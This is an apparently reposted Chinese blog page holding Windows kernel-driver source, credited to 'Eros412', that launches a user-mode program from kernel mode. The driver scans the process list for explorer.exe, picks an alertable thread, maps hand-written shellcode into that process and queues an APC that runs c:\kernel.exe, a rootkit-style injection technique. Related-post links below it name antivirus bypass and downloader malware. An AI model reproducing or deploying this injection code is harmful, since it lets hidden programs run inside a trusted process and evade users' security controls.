逆向工程之内核下创建用户进程
来源:互联网 发布:电脑网络不稳定老掉线 编辑:程序博客网 时间:2024/05/16 12:49
//By:Eros412
#include <ntddk.h>
#include <ntifs.h>
PKAPC_STATE ApcState;
ULONG peprocess;
ULONG explorer;
PMDL mdl;
typedef enum _KAPC_ENVIRONMENT {
OriginalApcEnvironment,
AttachedApcEnvironment,
CurrentApcEnvironment,
InsertApcEnvironment
} KAPC_ENVIRONMENT;
NTKERNELAPI
VOID
KeInitializeApc (
PKAPC Apc,
PETHREAD Thread,
KAPC_ENVIRONMENT Environment,
PKKERNEL_ROUTINE KernelRoutine,
PKRUNDOWN_ROUTINE RundownRoutine,
PKNORMAL_ROUTINE NormalRoutine,
KPROCESSOR_MODE ProcessorMode,
PVOID NormalContext
);
NTKERNELAPI
BOOLEAN
KeInsertQueueApc (
PKAPC Apc,
PVOID SystemArgument1,
PVOID SystemArgument2,
KPRIORITY Increment
);
NTKERNELAPI
VOID
ExFreePoolWithTag(
IN PVOID P,
IN ULONG Tag
);
__declspec(naked) void call_me()
{
_asm{
mov eax,0x7C86136D
push 1
nop
push 0ABCDh
call eax
jmp here
_emit 0x63 //路径:c:/kernel.exe
_emit 0x3A
_emit 0x5C
_emit 0x6B
_emit 0x65
_emit 0x72
_emit 0x6E
_emit 0x65
_emit 0x6C
_emit 0x2E
_emit 0x65
_emit 0x78
_emit 0x65
_emit 0x00
_emit 0x00
here:
nop
retn 0x0C
}
}
VOID OnUnload(
IN PDRIVER_OBJECT pDriverObject
)
{
if(pDriverObject->DeviceObject!=NULL)
IoDeleteDevice(pDriverObject->DeviceObject);
}
VOID myroutine(
IN PKAPC Apc,
IN OUT PKNORMAL_ROUTINE *NormalRoutine,
IN OUT PVOID *NormalContext,
IN OUT PVOID *SystemArgument1,
IN OUT PVOID *SystemArgument2
)
{
ExFreePoolWithTag(Apc,0);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath
)
{
unsigned char alertable;
int activethread;
ULONG kthread;
PLIST_ENTRY cur;
PLIST_ENTRY next;
PLIST_ENTRY tcur;
PLIST_ENTRY tnext;
unsigned char * imagename;
UNICODE_STRING us;
PDEVICE_OBJECT _device;
PRKAPC apc;
PVOID mappedmemory;
ULONG jmpaddr_9;
ULONG jmpaddr_14;
RtlInitUnicodeString(&us,L"//Device//KernelExec");
IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device);
pDriverObject->DriverUnload=OnUnload;
peprocess=(ULONG)IoGetCurrentProcess();
cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088);
do{
imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255);
imagename=(unsigned char*)((ULONG)peprocess+0x174);
activethread=*(ULONG*)((ULONG)peprocess+0x1a0);
if(!_strnicmp(imagename,"explorer.exe",12)){
DbgPrint("%s/t%d threads",imagename,activethread);
explorer=peprocess;
tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190);
do{
kthread=(ULONG)tnext-0x22C;
alertable=*(unsigned char*)(kthread+0x164);
if((int)alertable==TRUE){
DbgPrint("KernelExec -> Found alertable thread");
break;
}
tnext=tnext->Flink;
}while(tnext!=tcur);
break;
}
next=next->Flink;
peprocess=(ULONG)next-0x088;
}while(next!=cur);
DbgPrint("KernelExec -> Targeted thread: 0x%p",kthread);
apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444);
if(apc==NULL)
DbgPrint("KernelExec -> Failed to allocate memory");
mdl=IoAllocateMdl(call_me,100,0,0,0);
if(mdl==0){
DbgPrint("KernelExec -> Failed to allocate MDL");
ExFreePoolWithTag(apc,0);
goto end1;
}
MmProbeAndLockPages(mdl,0,1);
ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE));
KeStackAttachProcess((PKPROCESS)explorer,ApcState);
mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10);
if(mappedmemory==NULL){
DbgPrint("KernelExec -> Cannot map address");
KeUnstackDetachProcess(ApcState);
IoFreeMdl(mdl);
ExFreePoolWithTag(apc,0);
goto end1;
}
DbgPrint("KernelExec -> UserMode memory at address:0x%p",mappedmemory);
jmpaddr_9 = (ULONG)mappedmemory+0x9;
jmpaddr_14 = (ULONG)mappedmemory+0x14-3; //relative jmp 2字节,所以减3
_asm{
pushad
pushfd
mov ecx,jmpaddr_9
mov edx,jmpaddr_14
mov [ecx],edx
popfd
popad
}
KeUnstackDetachProcess (ApcState);
KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0);
if(!KeInsertQueueApc(apc,0,0,0))
DbgPrint("KernelExec -> Failed to insert APC");
DbgPrint("KernelExec -> APC delivered");
end1:
return STATUS_SUCCESS;
}
- 逆向工程之内核下创建用户进程
- 【转】逆向工程之内核下创建用户进程(插APC)
- 逆向工程的创建
- 逆向工程创建(2)
- 浅析内核中用户进程的创建
- {软件工程}之逆向工程
- Mybaits之逆向工程
- Mybatis之逆向工程
- Mybatis之逆向工程
- Mybatis之逆向工程
- windows内核状态下进程创建解析
- 逆向工程之表达式优化识别(4)-除法(下)
- Linux内核工程导论——进程:内核与用户空间的进程通信
- Linux下的进程类别(内核线程、轻量级进程和用户进程)以及其创建方式--Linux进程的管理与调度(四)
- linux内核之进程创建do_fork
- Windows创建进程的用户态和内核态交互
- Linux内核工程导论——用户空间进程使用内核资源
- Linux内核工程导论——进程:用户进程间通信
- fjnu 1823 The Worm Turns
- 各种酒英文名
- fjnu 1310 TEX Quotes
- fjnu 1310 TEX Quotes
- java 发送mail
- 逆向工程之内核下创建用户进程
- SOA 新业务语言 新系统架构——参考模型和重要概念
- NTFS和FAT32互相转换
- 恢复SSDT使瑞星保护失效
- fjnu 1543 Ones
- 现在,该你出场(英雄会刊首语)
- fjnu 1892 A Mathematical Curiosity
- 怎么做一个壳 Part
- 机器狗写入到userinit.exe文件的下载者源码
